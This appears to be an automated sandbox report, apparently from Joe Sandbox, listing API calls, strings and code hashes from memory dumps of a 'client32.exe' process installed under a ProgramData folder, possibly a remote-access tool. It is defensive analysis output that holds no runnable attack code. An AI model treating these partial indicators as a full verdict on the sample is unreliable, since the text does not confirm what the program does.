                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: wsprintf$ErrorExitLastMessageProcess
                                                                                                • String ID: %s%s.bin$445817$clientinv.cpp$m_pDoInv == NULL
                                                                                                • API String ID: 4180936305-1165179207
                                                                                                • Opcode ID: d3e42ad2085115a2bbc1dc31e6289f361993e2543b0696b5117b3c6d4b3d699b
                                                                                                • Instruction ID: 4b30c984cb9feb044c1d7ab8c0844ab34c920fbc261825ed793c706054f3ad77
                                                                                                • Opcode Fuzzy Hash: d3e42ad2085115a2bbc1dc31e6289f361993e2543b0696b5117b3c6d4b3d699b
                                                                                                • Instruction Fuzzy Hash: D82190B5F00705AFD710CF65CC41BAAB7F4EB88758F10853DE86697681EB35A8008B51
                                                                                                APIs
                                                                                                • _malloc.LIBCMT ref: 69D04A05
                                                                                                  • Part of subcall function 69D01B69: __FF_MSGBANNER.LIBCMT ref: 69D01B82
                                                                                                  • Part of subcall function 69D01B69: __NMSG_WRITE.LIBCMT ref: 69D01B89
                                                                                                  • Part of subcall function 69D01B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,69D0D3C1,69D06E81,00000001,69D06E81,?,69D0F447,00000018,69D27738,0000000C,69D0F4D7), ref: 69D01BAE
                                                                                                • _free.LIBCMT ref: 69D04A18
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AllocateHeap_free_malloc
                                                                                                • String ID:
                                                                                                • API String ID: 1020059152-0
                                                                                                • Opcode ID: c28dd7c47f4b9f3353f592d7b1452a9de3d12874d2bc4e59691fff694010595c
                                                                                                • Instruction ID: eda3b8f6b1211e703ea314e18066ba8f8cacd44e6f0dd325afba6429b09fc387
                                                                                                • Opcode Fuzzy Hash: c28dd7c47f4b9f3353f592d7b1452a9de3d12874d2bc4e59691fff694010595c
                                                                                                • Instruction Fuzzy Hash: F2112736488211EECB119F78E964F4D3754FF563BCB50D13AE948ABD40FB30888086A4
                                                                                                APIs
                                                                                                • GetFileAttributesA.KERNEL32(11145918,00000000,?,11145918,00000000), ref: 1114525C
                                                                                                • __strdup.LIBCMT ref: 11145277
                                                                                                  • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
                                                                                                  • Part of subcall function 11145240: _free.LIBCMT ref: 1114529E
                                                                                                • _free.LIBCMT ref: 111452AC
                                                                                                  • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000), ref: 11163ABB
                                                                                                  • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                                                • CreateDirectoryA.KERNEL32(11145918,00000000,?,?,?,11145918,00000000), ref: 111452B7
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$AttributesCreateDirectoryErrorFileFreeHeapLast__strdup_strrchr
                                                                                                • String ID:
                                                                                                • API String ID: 398584587-0
                                                                                                • Opcode ID: 0f4bda93c2fa95a79c6cfec15824fc43f5b70deef06045cf9c901e7bc6b82896
                                                                                                • Instruction ID: a914e2cea8ad1481f503ba01f1d1a08edacf548165b8a11fd341c03149d2e1b0
                                                                                                • Opcode Fuzzy Hash: 0f4bda93c2fa95a79c6cfec15824fc43f5b70deef06045cf9c901e7bc6b82896
                                                                                                • Instruction Fuzzy Hash: 9301D276A04216ABF34115BD6D01FABBB8C8BD2A78F240173F84DD6A81E752E41681A2
                                                                                                APIs
                                                                                                • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 1100EE52
                                                                                                  • Part of subcall function 111616DA: _setlocale.LIBCMT ref: 111616EC
                                                                                                • _free.LIBCMT ref: 1100EE64
                                                                                                  • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000), ref: 11163ABB
                                                                                                  • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                                                • _free.LIBCMT ref: 1100EE77
                                                                                                • _free.LIBCMT ref: 1100EE8A
                                                                                                • _free.LIBCMT ref: 1100EE9D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
                                                                                                • String ID:
                                                                                                • API String ID: 3515823920-0
                                                                                                • Opcode ID: ed7eb8e9888c5118949983cd0268dd79b6cba560ecac2a4a446fb5dc8afa845e
                                                                                                • Instruction ID: a44a88996e3d62c283fa82fd04d5e1258298656dbf2da44853d36c331dab430a
                                                                                                • Opcode Fuzzy Hash: ed7eb8e9888c5118949983cd0268dd79b6cba560ecac2a4a446fb5dc8afa845e
                                                                                                • Instruction Fuzzy Hash: 9511B2F2D046559BE720CF99D800A5BFBECEB50764F144A2AE49AD3640E7B2F904CA51
                                                                                                APIs
                                                                                                  • Part of subcall function 111457A0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11195AD8), ref: 1114580D
                                                                                                  • Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?), ref: 1114584E
                                                                                                  • Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 111458AB
                                                                                                • wsprintfA.USER32 ref: 1114650E
                                                                                                • wsprintfA.USER32 ref: 11146524
                                                                                                  • Part of subcall function 11143E00: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 11143E97
                                                                                                  • Part of subcall function 11143E00: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 11143EB7
                                                                                                  • Part of subcall function 11143E00: CloseHandle.KERNEL32(00000000), ref: 11143EBF
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$CreateFolderPathwsprintf$CloseHandleModuleName
                                                                                                • String ID: %sNSA.LIC$%sNSM.LIC$NSM.LIC
                                                                                                • API String ID: 3779116287-2600120591
                                                                                                • Opcode ID: b80d813afa46409255703ba7a7584a715aa6e7e8051bc230ff80af9931e0e18b
                                                                                                • Instruction ID: d6aa3785d543843f1191885663c1f1b2da884e9fda22ce0040deef08ed208be3
                                                                                                • Opcode Fuzzy Hash: b80d813afa46409255703ba7a7584a715aa6e7e8051bc230ff80af9931e0e18b
                                                                                                • Instruction Fuzzy Hash: 7B01B5BA90122DA6CB10DBB09D41FDEF77CCB1460DF5005A5E8099A540EE60BE44DBD1
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Message$DispatchInitializeTranslateUninitialize
                                                                                                • String ID:
                                                                                                • API String ID: 3550192930-0
                                                                                                • Opcode ID: cc0c84c49c7e2416c752fb198c95613c6e3beb4d5de04bc6f877ef0d92a8c20d
                                                                                                • Instruction ID: c6f08b4013ced19d6869e69a0d946a3ee91e256cb2334e467ebd10f862add052
                                                                                                • Opcode Fuzzy Hash: cc0c84c49c7e2416c752fb198c95613c6e3beb4d5de04bc6f877ef0d92a8c20d
                                                                                                • Instruction Fuzzy Hash: A301CC35D0131E9BEB24DAA0DD85F99B3F8AF48719F0002AAE915E2181E774E5048B61
                                                                                                APIs
                                                                                                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 11143E97
                                                                                                • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 11143EB7
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 11143EBF
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateFile$CloseHandle
                                                                                                • String ID: "
                                                                                                • API String ID: 1443461169-123907689
                                                                                                APIs
                                                                                                  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                                • SetEvent.KERNEL32(?,Client,DisableGeolocation,00000000,00000000,986DAFD2,756F13E0,?,00000000,111821CB,000000FF,?,11030776,UseIPC,00000001,00000000), ref: 1102D8E7
                                                                                                  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                                  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                                  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                                  • Part of subcall function 11110280: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,774E42C0,?,11110F3D,00000000,00000001,?,?,?,?,?,11031700), ref: 1111029E
                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 1102D8AA
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Event$Create$__wcstoi64_malloc_memsetwsprintf
                                                                                                • String ID: Client$DisableGeolocation
                                                                                                • API String ID: 3315423714-4166767992
                                                                                                APIs
                                                                                                • GetMessageA.USER32 ref: 1102783A
                                                                                                  • Part of subcall function 110CD940: EnterCriticalSection.KERNEL32(00000000,00000000,75097BD3,00000000,75097809,1105E7CB,?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD95B
                                                                                                  • Part of subcall function 110CD940: SendMessageA.USER32(00000000,00000476,00000000,00000000,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD988
                                                                                                  • Part of subcall function 110CD940: SendMessageA.USER32(00000000,00000475,00000000,?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD99A
                                                                                                  • Part of subcall function 110CD940: LeaveCriticalSection.KERNEL32(?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD9A4
                                                                                                • TranslateMessage.USER32(?), ref: 11027850
                                                                                                • DispatchMessageA.USER32(?,?,?,?,?,?,?,?,1103081D), ref: 11027856
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Message$CriticalSectionSend$DispatchEnterLeaveTranslate
                                                                                                • String ID: Exit Msgloop, quit=%d
                                                                                                • API String ID: 3212272093-2210386016
                                                                                                APIs
                                                                                                • GetTickCount.KERNEL32 ref: 110179ED
                                                                                                  • Part of subcall function 110178F0: WaitForSingleObject.KERNEL32(0000018C,000000FF), ref: 1101792C
                                                                                                  • Part of subcall function 110178F0: CoInitialize.OLE32(00000000), ref: 11017935
                                                                                                  • Part of subcall function 110178F0: _GetRawWMIStringW@16.PCICL32(Win32_ComputerSystem,00000001,?,?), ref: 1101795C
                                                                                                  • Part of subcall function 110178F0: CoUninitialize.OLE32 ref: 110179C0
                                                                                                  • Part of subcall function 11017810: WaitForSingleObject.KERNEL32(0000018C,000000FF), ref: 11017842
                                                                                                  • Part of subcall function 11017810: CoInitialize.OLE32(00000000), ref: 1101784B
                                                                                                  • Part of subcall function 11017810: _GetRawWMIStringW@16.PCICL32(Win32_SystemEnclosure,00000001,?,?), ref: 11017872
                                                                                                  • Part of subcall function 11017810: CoUninitialize.OLE32 ref: 110178D0
                                                                                                • SetEvent.KERNEL32(0000018C), ref: 11017A0D
                                                                                                • GetTickCount.KERNEL32 ref: 11017A13
                                                                                                Strings
                                                                                                • touchkbd, systype=%d, chassis=%d, took %d ms, xrefs: 11017A1D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CountInitializeObjectSingleStringTickUninitializeW@16Wait$Event
                                                                                                • String ID: touchkbd, systype=%d, chassis=%d, took %d ms
                                                                                                • API String ID: 3804766296-4122679463
                                                                                                APIs
                                                                                                • GetProcAddress.KERNEL32(?,GetModuleFileNameExA,00000000,?,69CE8E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 69CE5014
                                                                                                • K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,69CE8E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 69CE5034
                                                                                                • SetLastError.KERNEL32(00000078,00000000,?,69CE8E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 69CE503D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressErrorFileLastModuleNameProc
                                                                                                • String ID: GetModuleFileNameExA
                                                                                                • API String ID: 4084229558-758377266
                                                                                                APIs
                                                                                                • GetProcAddress.KERNEL32(00000000,EnumProcessModules,00000000,?,69CE8E0D,00000000,?,00000FA0,?), ref: 69CE4FC4
                                                                                                • K32EnumProcessModules.KERNEL32(00000FA0,?,00000000,69CE8E0D,00000000,?,69CE8E0D,00000000,?,00000FA0,?), ref: 69CE4FE4
                                                                                                • SetLastError.KERNEL32(00000078,00000000,?,69CE8E0D,00000000,?,00000FA0,?), ref: 69CE4FED
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressEnumErrorLastModulesProcProcess
                                                                                                • String ID: EnumProcessModules
                                                                                                • API String ID: 3858832252-3735562946
                                                                                                APIs
                                                                                                  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                                • CreateThread.KERNEL32(00000000,00001000,Function_00138580,00000000,00000000,111396D2), ref: 1113877E
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 11138785
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseCreateHandleThread__wcstoi64
                                                                                                • String ID: *AutoICFConfig$Client
                                                                                                • API String ID: 3257255551-59951473
                                                                                                APIs
                                                                                                • Sleep.KERNEL32(000000FA), ref: 11070FE7
                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 11070FF4
                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 110710C6
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$EnterLeaveSleep
                                                                                                • String ID: Push
                                                                                                • API String ID: 1566154052-4278761818
                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32(69D2B898,00000000,?,?,?,69CEDA7F,?,00000000), ref: 69CEA503
                                                                                                • InterlockedExchange.KERNEL32(?,00000000,?,69CEDA7F,?,00000000), ref: 69CEA568
                                                                                                • Sleep.KERNEL32(00000000,?,69CEDA7F,?,00000000), ref: 69CEA581
                                                                                                • LeaveCriticalSection.KERNEL32(69D2B898,00000000), ref: 69CEA5B3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$EnterExchangeInterlockedLeaveSleep
                                                                                                • String ID:
                                                                                                • API String ID: 4212191310-0
                                                                                                APIs
                                                                                                • InitializeCriticalSection.KERNEL32(hKB,986DAFD2,?,?,?,?,-00000001,1118B2A8,000000FF,?,11110508,00000001,?,1116A543,?), ref: 11110464
                                                                                                • EnterCriticalSection.KERNEL32(hKB,986DAFD2,?,?,?,?,-00000001,1118B2A8,000000FF,?,11110508,00000001,?,1116A543,?), ref: 11110480
                                                                                                • LeaveCriticalSection.KERNEL32(hKB,?,?,?,?,-00000001,1118B2A8,000000FF,?,11110508,00000001,?,1116A543,?), ref: 111104C8
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$EnterInitializeLeave
                                                                                                • String ID: hKB
                                                                                                • API String ID: 3991485460-853210616
                                                                                                APIs
                                                                                                • GetCommandLineA.KERNEL32 ref: 00A11027
                                                                                                • GetStartupInfoA.KERNEL32 ref: 00A1107B
                                                                                                • GetModuleHandleA.KERNEL32(00000000,00000000,00000000,?), ref: 00A11096
                                                                                                • ExitProcess.KERNEL32 ref: 00A110A3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644020864.0000000000A11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A10000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_a10000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CommandExitHandleInfoLineModuleProcessStartup
                                                                                                • String ID:
                                                                                                • API String ID: 2164999147-0
                                                                                                APIs
                                                                                                • WaitForSingleObject.KERNEL32(?,000001F4), ref: 11030DBC
                                                                                                • CloseHandle.KERNEL32(?), ref: 11030DC9
                                                                                                • FreeLibrary.KERNEL32(?), ref: 11030DD4
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 11030DDB
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseHandle$FreeLibraryObjectSingleWait
                                                                                                • String ID:
                                                                                                • API String ID: 1314093303-0
                                                                                                APIs
                                                                                                • GetCurrentProcess.KERNEL32(11029A9F,?,11144A43,?), ref: 111447FC
                                                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\ProgramData\i99ekubc\client32.exe,00000104,?,11144A43,?), ref: 11144819
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CurrentFileModuleNameProcess
                                                                                                • String ID: C:\ProgramData\i99ekubc\client32.exe
                                                                                                • API String ID: 2251294070-2387543234
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _memmove
                                                                                                • String ID: hbuf->data$httputil.c
                                                                                                • API String ID: 4104443479-2732665889
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _calloc
                                                                                                • String ID:
                                                                                                • API String ID: 1679841372-0
                                                                                                APIs
                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 11116E81
                                                                                                • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 11116EBE
                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 11116EC5
                                                                                                  • Part of subcall function 11143BD0: RegQueryValueExA.KERNEL32 ref: 11143BF0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseValue$Query
                                                                                                • String ID:
                                                                                                • API String ID: 392431914-0
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 69CE8FE4
                                                                                                • getsockname.WSOCK32(?,?,00000010), ref: 69CE9005
                                                                                                • WSAGetLastError.WSOCK32(?,?,00000010,?,02EF2F78,?), ref: 69CE902E
                                                                                                  • Part of subcall function 69CE5840: inet_ntoa.WSOCK32(69D2B8DA), ref: 69CE5852
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast_memsetgetsocknameinet_ntoa
                                                                                                • String ID:
                                                                                                • API String ID: 3066294524-0
                                                                                                APIs
                                                                                                • GetSystemDirectoryA.KERNEL32(?,00000104,?), ref: 1111216A
                                                                                                • __wsplitpath.LIBCMT ref: 11112185
                                                                                                  • Part of subcall function 11169F04: __splitpath_helper.LIBCMT ref: 11169F46
                                                                                                • GetVolumeInformationA.KERNEL32 ref: 111121B9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: DirectoryInformationSystemVolume__splitpath_helper__wsplitpath
                                                                                                • String ID:
                                                                                                • API String ID: 1847508633-0
                                                                                                APIs
                                                                                                • GetCurrentProcess.KERNEL32(00020008,00000000,?,?,110F8244,00000001,11142328,_debug,TraceCopyData,00000000,00000000,?,?,00000000,?), ref: 1109EE21
                                                                                                • OpenProcessToken.ADVAPI32(00000000,?,?,110F8244,00000001,11142328,_debug,TraceCopyData,00000000,00000000,?,?,00000000,?), ref: 1109EE28
                                                                                                  • Part of subcall function 1109ED30: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,11030346,?,00000000), ref: 1109ED68
                                                                                                  • Part of subcall function 1109ED30: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 1109ED84
                                                                                                  • Part of subcall function 1109ED30: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,0041D3B8,0041D3B8,0041D3B8,0041D3B8,0041D3B8,0041D3B8,0041D3B8,111EFB64,?,00000001,00000001), ref: 1109EDB0
                                                                                                  • Part of subcall function 1109ED30: EqualSid.ADVAPI32(?,0041D3B8,?,00000001,00000001), ref: 1109EDC3
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 1109EE47
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Token$InformationProcess$AllocateCloseCurrentEqualHandleInitializeOpen
                                                                                                • String ID:
                                                                                                • API String ID: 2256153495-0
                                                                                                APIs
                                                                                                • LoadLibraryA.KERNEL32(00000000), ref: 11069542
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: LibraryLoad
                                                                                                • String ID: ??CTL32.DLL
                                                                                                • API String ID: 1029625771-2984404022
                                                                                                APIs
                                                                                                • inet_ntoa.WSOCK32(69D2B8DA), ref: 69CE5852
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: inet_ntoa
                                                                                                • String ID: gfff
                                                                                                • API String ID: 1879540557-1553575800
                                                                                                • Opcode ID: 30d771e4efecf2de1b4b7cdfc7e46be8ffc974b213b36202af62f32905784b99
                                                                                                • Instruction ID: 921516e2b0aa251f878f945425502120ebc0f71ac446ab22038222b9323dbe7d
                                                                                                • Opcode Fuzzy Hash: 30d771e4efecf2de1b4b7cdfc7e46be8ffc974b213b36202af62f32905784b99
                                                                                                • Instruction Fuzzy Hash: E9117B226482DB8BCB268A2DB8606D6BFD9DF96350B184569D8CACB301E611D80AC7D1
                                                                                                APIs
                                                                                                • GetDriveTypeA.KERNEL32(?), ref: 110271CD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: DriveType
                                                                                                • String ID: ?:\
                                                                                                • API String ID: 338552980-2533537817
                                                                                                • Opcode ID: c5edebcb86b8a007a6a1af48cd80f0235394c84cf34213d7754056fe959a7dee
                                                                                                • Instruction ID: 6b943fba42bebc5ebf3cfcfc9c23cd16540ffeab11205f7f0861f1320acd89e1
                                                                                                • Opcode Fuzzy Hash: c5edebcb86b8a007a6a1af48cd80f0235394c84cf34213d7754056fe959a7dee
                                                                                                • Instruction Fuzzy Hash: F7F0BB70C44BD96AFB22CE5484445867FDA4F172A9F64C4DEDCD886501D375D188CB91
                                                                                                APIs
                                                                                                  • Part of subcall function 110ED4E0: RegCloseKey.ADVAPI32(?), ref: 110ED4ED
                                                                                                • RegOpenKeyExA.KERNEL32(?,00000056,00000000,00020019,?), ref: 110ED53C
